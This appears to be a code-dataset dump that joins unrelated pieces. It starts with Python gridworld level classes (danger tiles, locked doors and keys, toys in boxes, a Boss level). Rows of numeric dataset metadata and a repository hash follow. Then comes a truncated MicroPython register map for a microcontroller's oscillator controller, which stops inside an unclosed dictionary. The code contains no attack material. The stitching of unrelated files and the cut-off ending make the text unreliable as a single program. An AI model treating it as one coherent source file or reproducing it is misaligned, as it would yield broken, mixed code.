        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=True, n_rivers=1)
class Level_DangerOpenDoor2Cross(Level_DangerOpenDoor):
    """Level_DangerOpenDoor limited to at most two danger-tile rivers."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=True, n_rivers=2)
class Level_DangerGoToFav1Cross(Level_DangerGoToFav):
    """Level_DangerGoToFav limited to at most one danger-tile river."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=True, n_rivers=1)
class Level_DangerGoToFav2Cross(Level_DangerGoToFav):
    """Level_DangerGoToFav limited to at most two danger-tile rivers."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=True, n_rivers=2)
# Combine 3 tasks
class Level_DangerGoToFavOpenDoor(RoomGridLevel):
    """Combined task: avoid danger tiles, find the key to the locked doors,
    and reach jack's favorite toy (three rooms in a row)."""

    def __init__(self, seed=None, room_size=7, call=True):
        # Candidate lava colors; the dangerous one is picked in gen_mission.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        self.goal_pos = (room_size * 2 - 3, room_size - 2)
        self.agent_start_pos = (2, 1)
        # When call is False, an Oracle object is placed on the grid instead.
        self.call = call
        self.names = ['jack', 'mary']
        super().__init__(
            num_rows=1,
            num_cols=3,
            room_size=room_size,
            seed=seed
        )

    def gen_mission(self):
        """Lay out danger tiles, two locked id-doors, two keys, and two toys."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Fix door positions on the two shared walls.
        self.room_grid[0][0].door_pos[0] = (6, 1)
        self.room_grid[0][1].door_pos[2] = (6, 1)
        self.room_grid[0][1].door_pos[0] = (12, 5)
        self.room_grid[0][2].door_pos[2] = (12, 5)
        #self.add_door(0, 0, door_idx=0, locked=False)
        #self.add_door(1, 0, door_idx=0, locked=False)
        # Place obstacles (lava or walls)
        self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        add_danger_tiles_anti_diag(self)
        self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        add_danger_tiles_diag(self)
        self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        add_danger_tiles_anti_diag(self, offset=12)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (self.room_size, 1)
        else:
            # Clear a strip for the agent and place an Oracle next to it.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        # GoToFav
        self.num_dists = 2
        objs = []
        obj = create_rnd_obj(self)
        place_obj(self, 1, self.room_size - 2, obj)
        objs.append(obj)
        obj = create_rnd_obj(self)
        place_obj(self, (self.room_size - 1) * 3 - 1, 1, obj)
        objs.append(obj)
        target_obj = self._rand_elem(objs)
        # OpenDoor
        colors = COLOR_NAMES[0:3]
        self.np_random.shuffle(colors)
        n_keys = 2
        # Add a door of color A connecting left and middle room
        # NOTE(review): locked_door_id is drawn but never used below — verify intent.
        locked_door_id = self._rand_int(0, n_keys)
        self.locked_doors = []
        self.locked_doors.append(add_id_door(self, 0, 0, id=0, door_idx=0, color=colors[0], locked=True)[0])
        self.locked_doors.append(add_id_door(self, 1, 0, id=0, door_idx=0, color=colors[1], locked=True)[0])
        agent_room_i, agent_room_j = 1, 0
        self.np_random.shuffle(colors)
        # Two keys at absolute positions; only colors[0] opens the id-0 doors.
        add_id_object_abs(self, self.room_size - 1 + 1, self.room_size - 2, id=0, kind='key', color=colors[0])
        add_id_object_abs(self, 2 * (self.room_size - 1) - 1, self.room_size - 2, id=1, kind='key', color=colors[1])
        self.real_key_color = colors[0]
        self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="avoid danger zone, find the key to open the door, go to {} toy".format(self.names[0]), danger=True)
        # room_id = col + row * num_cols of the room containing the target.
        room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
        self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
                               '{} {} in room{}'.format(target_obj.color, target_obj.type, room_id),
                               'danger zone is {}'.format(self.lava_colors[1 - self.target_idx])
                               ]
class Level_OpenDoorGoToFavoriteObjInBox(RoomGridLevel):
    """
    Go to an object, the object may be in another room. Many distractors.

    The target ball hides inside a box whose room's doors get locked; two
    candidate keys are placed in the agent's starting room.
    """

    def __init__(
        self,
        room_size=5,
        num_rows=3,
        num_cols=3,
        num_dists=3,
        doors_open=False,
        seed=None,
        all_doors=True,
        num_colors=2,
        oracle_mode='call'
    ):
        self.num_dists = num_dists
        self.doors_open = doors_open
        self.num_rows = num_rows
        self.num_cols = num_cols
        self.all_doors = all_doors
        self.num_colors = num_colors
        self.names = ['jack', 'mary']
        self.others_fav = None
        self.oracle_mode = oracle_mode
        super().__init__(
            num_rows=num_rows,
            num_cols=num_cols,
            room_size=room_size,
            seed=seed
        )

    def gen_mission(self):
        """Place agent, doors (id=100), optional oracle, boxes, keys, and lock the target room."""
        agent_room_i = self._rand_int(0, self.num_cols)
        agent_room_j = self._rand_int(0, self.num_rows)
        self.place_agent(agent_room_i, agent_room_j)
        locked = False
        if self.all_doors:
            # Add internal doors with sentinel id=100; assumes a 3x3 grid.
            add_id_door(self, 0, 0, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 1, id=100, door_idx=0, locked=locked)
            add_id_door(self, 1, 1, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 2, id=100, door_idx=0, locked=locked)
            add_id_door(self, 1, 2, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 1, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 2, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 0, 1, id=100, door_idx=1, locked=locked)
            add_id_door(self, 1, 1, id=100, door_idx=1, locked=locked)
            add_id_door(self, 2, 1, id=100, door_idx=1, locked=locked)
        else:
            self.connect_all()
        if self.doors_open:
            self.open_all_doors()
        if self.oracle_mode == 'single_move':
            oracle = Oracle(color='red')
            self.place_in_room(agent_room_i, agent_room_j, oracle)
            self.oracle = oracle
        # ObjInBox
        self.n_boxes = 2
        colors = COLOR_NAMES[:self.n_boxes]
        shuffled_colors = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors)
        shuffled_colors2 = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors2)
        target_id = self._rand_int(0, self.n_boxes)
        toy_owner = self._rand_int(0, 2)
        box_owner = 1 - toy_owner
        for i in range(self.n_boxes):
            ball = Ball(color=shuffled_colors[i])
            box = BoxOverLap(color=shuffled_colors2[i], contains=ball)
            # Re-draw until the box lands in a room other than the agent's.
            room_i, room_j = self.np_random.randint(0, self.num_cols), self._rand_int(0, self.num_rows)
            while (room_i, room_j) == (agent_room_i, agent_room_j):
                room_i, room_j = self.np_random.randint(0, self.num_cols), self._rand_int(0, self.num_rows)
            self.place_in_room(room_i, room_j, box)
            if i == target_id:
                self.box_owner = self.names[box_owner]
                self.target_box = box
                self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Find the key to the door, find ' + self.names[toy_owner] + ' toy',
                                              danger=True)
                room_id = (box.cur_pos[0] // self.room_size) + (box.cur_pos[1] // self.room_size) * self.num_cols
        # OpenDoor
        colors = COLOR_NAMES[0:3]
        n_keys = 2
        # Add a door of color A connecting left and middle room
        locked_door_id = self._rand_int(0, n_keys)
        for i in range(n_keys):
            obj, _ = add_id_object(self, agent_room_i, agent_room_j, id=i, kind="key", color=colors[i])
            if i == locked_door_id:
                self.real_key_color = colors[i]
        self.target_doors = []
        # NOTE(review): the // 3 and % 3 assume a 3-wide grid — confirm for
        # non-default num_rows/num_cols.
        locked_room_i, locked_room_j = room_id // 3, room_id % 3
        for door in self.room_grid[locked_room_i][locked_room_j].doors:
            if door is not None:
                door.is_locked = True
                door.id = locked_door_id
                self.target_doors.append(door)
class Level_DangerGoToFavObjInBox(RoomGridLevel):
    """Two-room level: cross danger tiles, then find the toy hidden in a box."""

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3):
        # Candidate lava colors; the dangerous one is picked in gen_mission.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        self.goal_pos = (room_size * 2 - 3, room_size - 2)
        self.agent_start_pos = (2, 1)
        # When call is False, an Oracle object is placed on the grid instead.
        self.call = call
        self.names = ['jack', 'mary']
        # anti_danger toggles the anti-diagonal danger-tile patch.
        self.anti_danger = anti_danger
        self.max_n_rivers = n_rivers
        super().__init__(
            num_rows=1,
            num_cols=2,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Lay out the door, danger tiles, agent/oracle, and the two ball-in-box targets."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Fix the door position on the shared wall before adding the door.
        self.room_grid[0][0].door_pos[0] = (6, 1)
        self.room_grid[0][1].door_pos[2] = (6, 1)
        self.add_door(0, 0, door_idx=0, locked=False)
        # Place obstacles (lava or walls)
        if self.anti_danger:
            self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
            add_danger_tiles_anti_diag(self)
        self.num_crossings = self.np_random.randint(1, (self.max_n_rivers + 1))
        add_danger_tiles_diag(self)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (self.room_size - 1, 1)
        else:
            # Clear a strip for the agent and place an Oracle next to it.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        self.open_all_doors()
        # ObjInBox: two boxes, ball and box colors shuffled independently.
        self.n_boxes = 2
        colors = COLOR_NAMES[:self.n_boxes]
        shuffled_colors = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors)
        shuffled_colors2 = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors2)
        target_id = self._rand_int(0, self.n_boxes)
        toy_owner = self._rand_int(0, 2)
        box_owner = 1 - toy_owner
        for i in range(self.n_boxes):
            ball = Ball(color=shuffled_colors[i])
            box = Box(color=shuffled_colors2[i], contains=ball)
            # One box in each room's bottom row.
            if i == 0:
                place_obj(self, 1, self.room_size - 2, box)
            else:
                place_obj(self, (self.room_size - 1) * 2 - 1, self.room_size - 2, box)
            if i == target_id:
                self.box_owner = self.names[box_owner]
                self.target_box = box
                self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Avoid danger zone, find ' + self.names[toy_owner] + ' toy',
                                              danger=True)
class Level_DangerOpenDoorObjInBox(RoomGridLevel):
    """Three-room combined task: danger tiles, a locked id-door with two
    candidate keys, and a toy hidden in one of two boxes."""

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3):
        # Candidate lava colors; the dangerous one is picked in gen_mission.
        self.lava_colors = ['yellow', 'blue']
        self.names = ['jack', 'mary']
        self.n_target = 2
        self.agent_start_pos = (2, 1)
        # When call is False, an Oracle object is placed on the grid instead.
        self.call = call
        self.failure_neg = failure_neg
        # anti_danger toggles the first anti-diagonal danger-tile patch.
        self.anti_danger = anti_danger
        self.max_n_rivers = n_rivers
        super().__init__(
            num_rows=1,
            num_cols=3,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Lay out danger tiles, the locked door and keys, and the two boxes."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Fix door positions on the shared walls.
        self.room_grid[0][0].door_pos[0] = (6, 1)
        self.room_grid[0][1].door_pos[2] = (6, 1)
        self.room_grid[0][1].door_pos[0] = (12, 5)
        door, _ = self.add_door(1, 0, door_idx=0, locked=False)
        door.is_open = True
        # Place obstacles (lava or walls)
        if self.anti_danger:
            self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
            add_danger_tiles_anti_diag(self)
        self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        add_danger_tiles_diag(self)
        self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
        add_danger_tiles_anti_diag(self, offset=12)
        # NOTE(review): this instruction is overwritten by the FindOrFailInstr
        # assigned at the end of this method — confirm it is intentional.
        self.instrs = GoToGoalInstr(door=True)
        if self.call:
            self.grid.set(1, self.room_size - 2, None)
            self.agent_pos = (1, self.room_size - 2)
        else:
            # Clear a strip for the agent and place an Oracle next to it.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        # Open Door Part
        colors = COLOR_NAMES[0:3]
        n_keys = 2
        # Add a door of color A connecting left and middle room
        locked_door_id = self._rand_int(0, n_keys)
        self.locked_door, _ = add_id_door(self, 0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
        self.target_doors = [self.locked_door]
        for i in range(n_keys):
            obj = KeyWID(i, colors[i])
            # Two keys at fixed grid positions; only the one whose id matches
            # locked_door_id opens the locked door.
            if i == 0:
                self.grid.set(self.room_size - 3, 1, obj)
            elif i == 1:
                self.grid.set(self.room_size - 2, 2, obj)
            if i == locked_door_id:
                self.real_key_color = colors[i]
        # ObjInBox: two boxes, ball and box colors shuffled independently.
        self.n_boxes = 2
        colors = COLOR_NAMES[:self.n_boxes]
        shuffled_colors = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors)
        shuffled_colors2 = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors2)
        target_id = self._rand_int(0, self.n_boxes)
        toy_owner = self._rand_int(0, 2)
        box_owner = 1 - toy_owner
        for i in range(self.n_boxes):
            ball = Ball(color=shuffled_colors[i])
            box = BoxOverLap(color=shuffled_colors2[i], contains=ball)
            if i == 0:
                place_obj(self, (self.room_size - 1) * 3 - 1, 1, box)
            else:
                place_obj(self, (self.room_size - 1) * 2 - 1, self.room_size - 2, box)
            if i == target_id:
                self.box_owner = self.names[box_owner]
                self.target_box = box
                self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Avoid danger zone, find the key to the door, find ' + self.names[toy_owner] + ' toy',
                                              danger=True)
# Boss level
class Level_Boss(RoomGridLevel):
    """
    Go to an object, the object may be in another room. Many distractors.

    Boss level combining the sub-tasks: a circular danger-tile patch in every
    room, all internal doors, two candidate keys, and a toy hidden in one of
    two boxes whose room gets locked.
    """

    def __init__(
        self,
        room_size=7,
        num_rows=3,
        num_cols=3,
        num_dists=3,
        doors_open=False,
        seed=None,
        all_doors=True,
        num_colors=2,
        oracle_mode='call'
    ):
        self.n_target = 2
        self.num_dists = num_dists
        self.doors_open = doors_open
        self.num_rows = num_rows
        self.num_cols = num_cols
        self.all_doors = all_doors
        self.num_colors = num_colors
        self.names = ['jack', 'mary']
        self.lava_colors = ['yellow', 'blue']
        self.others_fav = None
        self.oracle_mode = oracle_mode
        super().__init__(
            num_rows=num_rows,
            num_cols=num_cols,
            room_size=room_size,
            seed=seed
        )

    def gen_mission(self):
        """Place agent, doors, danger circles, boxes, keys, and lock the target room."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        agent_room_i = self._rand_int(0, self.num_cols)
        agent_room_j = self._rand_int(0, self.num_rows)
        self.place_agent(agent_room_i, agent_room_j)
        locked = False
        if self.all_doors:
            adjust_door_to_mid(self)
            # Internal doors with sentinel id=100; enumeration assumes 3x3 grid.
            add_id_door(self, 0, 0, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 1, id=100, door_idx=0, locked=locked)
            add_id_door(self, 1, 1, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 2, id=100, door_idx=0, locked=locked)
            add_id_door(self, 1, 2, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 1, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 2, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 0, 1, id=100, door_idx=1, locked=locked)
            add_id_door(self, 1, 1, id=100, door_idx=1, locked=locked)
            add_id_door(self, 2, 1, id=100, door_idx=1, locked=locked)
        else:
            self.connect_all()
        # One circular danger-tile patch per room (offsets assume room_size 7).
        add_danger_tiles_circle(self, i_offset=0, j_offset=0)
        add_danger_tiles_circle(self, i_offset=6, j_offset=0)
        add_danger_tiles_circle(self, i_offset=12, j_offset=0)
        add_danger_tiles_circle(self, i_offset=0, j_offset=6)
        add_danger_tiles_circle(self, i_offset=6, j_offset=6)
        add_danger_tiles_circle(self, i_offset=12, j_offset=6)
        add_danger_tiles_circle(self, i_offset=0, j_offset=12)
        add_danger_tiles_circle(self, i_offset=6, j_offset=12)
        add_danger_tiles_circle(self, i_offset=12, j_offset=12)
        if self.doors_open:
            self.open_all_doors()
        if self.oracle_mode == 'single_move':
            oracle = Oracle(color='red')
            self.place_in_room(agent_room_i, agent_room_j, oracle)
            self.oracle = oracle
        # ObjInBox: two boxes, ball and box colors shuffled independently.
        self.n_boxes = 2
        colors = COLOR_NAMES[:self.n_boxes]
        shuffled_colors = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors)
        shuffled_colors2 = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors2)
        target_id = self._rand_int(0, self.n_boxes)
        toy_owner = self._rand_int(0, 2)
        box_owner = 1 - toy_owner
        for i in range(self.n_boxes):
            ball = Ball(color=shuffled_colors[i])
            box = BoxOverLap(color=shuffled_colors2[i], contains=ball)
            # Re-draw until the box lands in a room other than the agent's.
            room_i, room_j = self.np_random.randint(0, self.num_cols), self._rand_int(0, self.num_rows)
            while (room_i, room_j) == (agent_room_i, agent_room_j):
                room_i, room_j = self.np_random.randint(0, self.num_cols), self._rand_int(0, self.num_rows)
            self.place_in_room(room_i, room_j, box)
            if i == target_id:
                self.box_owner = self.names[box_owner]
                self.target_box = box
                self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Avoid danger zone, find the key to the door, find ' + self.names[toy_owner] + ' toy',
                                              danger=True)
                room_id = (box.cur_pos[0] // self.room_size) + (box.cur_pos[1] // self.room_size) * self.num_cols
        # OpenDoor
        colors = COLOR_NAMES[0:3]
        n_keys = 2
        # Add a door of color A connecting left and middle room
        locked_door_id = self._rand_int(0, n_keys)
        for i in range(n_keys):
            obj, _ = add_id_object(self, agent_room_i, agent_room_j, id=i, kind="key", color=colors[i])
            if i == locked_door_id:
                self.real_key_color = colors[i]
        self.target_doors = []
        # Lock every door of the room holding the target box.  room_id encodes
        # col + row * num_cols, so derive (row, col) from num_cols instead of
        # the previous hard-coded 3 (identical for the 3x3 default).  The
        # debug print of the room's doors was removed.
        locked_room_i, locked_room_j = room_id // self.num_cols, room_id % self.num_cols
        for door in self.room_grid[locked_room_i][locked_room_j].doors:
            if door is not None:
                door.is_locked = True
                door.id = locked_door_id
                self.target_doors.append(door)
# Register all level classes defined in this module with the level registry.
register_levels(__name__, globals())
| 37.702413
| 208
| 0.586095
| 7,955
| 56,252
| 3.868259
| 0.034067
| 0.043936
| 0.027688
| 0.025315
| 0.91216
| 0.903549
| 0.887333
| 0.877779
| 0.866242
| 0.845021
| 0
| 0.027996
| 0.297056
| 56,252
| 1,491
| 209
| 37.7277
| 0.750215
| 0.043554
| 0
| 0.822595
| 0
| 0
| 0.025415
| 0
| 0
| 0
| 0
| 0
| 0.000883
| 1
| 0.047661
| false
| 0
| 0.007944
| 0.001765
| 0.088261
| 0.000883
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2745a03fb3d595654d12960f9c89aa235cac074
| 10,225
|
py
|
Python
|
ATSAMD51P19A/libsrc/ATSAMD51P19A/OSCCTRL_.py
|
t-ikegami/WioTerminal-CircuitPython
|
efbdc2e13ad969fe009d88f7ec4b836ca61ae973
|
[
"MIT"
] | null | null | null |
ATSAMD51P19A/libsrc/ATSAMD51P19A/OSCCTRL_.py
|
t-ikegami/WioTerminal-CircuitPython
|
efbdc2e13ad969fe009d88f7ec4b836ca61ae973
|
[
"MIT"
] | 1
|
2022-01-19T00:16:02.000Z
|
2022-01-26T03:43:34.000Z
|
ATSAMD51P19A/libsrc/ATSAMD51P19A/OSCCTRL_.py
|
t-ikegami/WioTerminal-CircuitPython
|
efbdc2e13ad969fe009d88f7ec4b836ca61ae973
|
[
"MIT"
] | null | null | null |
import uctypes as ct
# uctypes register-map descriptors for the ATSAMD51 OSCCTRL (oscillator
# controller) peripheral.  Each entry is
#   'REGNAME': (byte_offset, {field descriptors})
# and each field is encoded as
#   offset | ct.<TYPE>                         for the whole register ('reg')
#   offset | ct.BFUINT* | pos << ct.BF_POS | length << ct.BF_LEN
#                                              for an individual bit-field.
# Bit positions/widths presumably mirror the SAM D5x/E5x datasheet register
# summary — TODO confirm against the datasheet when modifying.

# Descriptor for one DPLL (digital PLL) instance; instantiated twice as an
# array under OSCCTRL_['DPLL'] below.
OSCCTRL_DPLL = {
    'DPLLCTRLA' : ( 0x00, {
        'reg' : 0x00 | ct.UINT8,
        'ENABLE' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'RUNSTDBY' : 0x00 | ct.BFUINT8 | 6 << ct.BF_POS | 1 << ct.BF_LEN,
        'ONDEMAND' : 0x00 | ct.BFUINT8 | 7 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    'DPLLRATIO' : ( 0x04, {
        'reg' : 0x00 | ct.UINT32,
        'LDR' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 13 << ct.BF_LEN,
        'LDRFRAC' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 5 << ct.BF_LEN,
    }),
    'DPLLCTRLB' : ( 0x08, {
        'reg' : 0x00 | ct.UINT32,
        'FILTER' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 4 << ct.BF_LEN,
        'WUF' : 0x00 | ct.BFUINT32 | 4 << ct.BF_POS | 1 << ct.BF_LEN,
        'REFCLK' : 0x00 | ct.BFUINT32 | 5 << ct.BF_POS | 3 << ct.BF_LEN,
        'LTIME' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 3 << ct.BF_LEN,
        'LBYPASS' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
        'DCOFILTER' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 3 << ct.BF_LEN,
        'DCOEN' : 0x00 | ct.BFUINT32 | 15 << ct.BF_POS | 1 << ct.BF_LEN,
        'DIV' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 11 << ct.BF_LEN,
    }),
    'DPLLSYNCBUSY' : ( 0x0C, {
        'reg' : 0x00 | ct.UINT32,
        'ENABLE' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLLRATIO' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    'DPLLSTATUS' : ( 0x10, {
        'reg' : 0x00 | ct.UINT32,
        'LOCK' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
        'CLKRDY' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
}

# Top-level OSCCTRL peripheral layout.  INTENCLR / INTENSET / INTFLAG share an
# identical bit layout (the usual clear/set/flag triple for one interrupt set).
OSCCTRL_ = {
    'EVCTRL' : ( 0x00, {
        'reg' : 0x00 | ct.UINT8,
        'CFDEO0' : 0x00 | ct.BFUINT8 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
        'CFDEO1' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    'INTENCLR' : ( 0x04, {
        'reg' : 0x00 | ct.UINT32,
        'XOSCRDY0' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCRDY1' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCFAIL0' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCFAIL1' : 0x00 | ct.BFUINT32 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLRDY' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLOOB' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLLCKF' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLLCKC' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLRCS' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LCKR' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LCKF' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LTO' : 0x00 | ct.BFUINT32 | 18 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LDRTO' : 0x00 | ct.BFUINT32 | 19 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LCKR' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LCKF' : 0x00 | ct.BFUINT32 | 25 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LTO' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LDRTO' : 0x00 | ct.BFUINT32 | 27 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    'INTENSET' : ( 0x08, {
        'reg' : 0x00 | ct.UINT32,
        'XOSCRDY0' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCRDY1' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCFAIL0' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCFAIL1' : 0x00 | ct.BFUINT32 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLRDY' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLOOB' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLLCKF' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLLCKC' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLRCS' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LCKR' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LCKF' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LTO' : 0x00 | ct.BFUINT32 | 18 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LDRTO' : 0x00 | ct.BFUINT32 | 19 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LCKR' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LCKF' : 0x00 | ct.BFUINT32 | 25 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LTO' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LDRTO' : 0x00 | ct.BFUINT32 | 27 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    'INTFLAG' : ( 0x0C, {
        'reg' : 0x00 | ct.UINT32,
        'XOSCRDY0' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCRDY1' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCFAIL0' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCFAIL1' : 0x00 | ct.BFUINT32 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLRDY' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLOOB' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLLCKF' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLLCKC' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLRCS' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LCKR' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LCKF' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
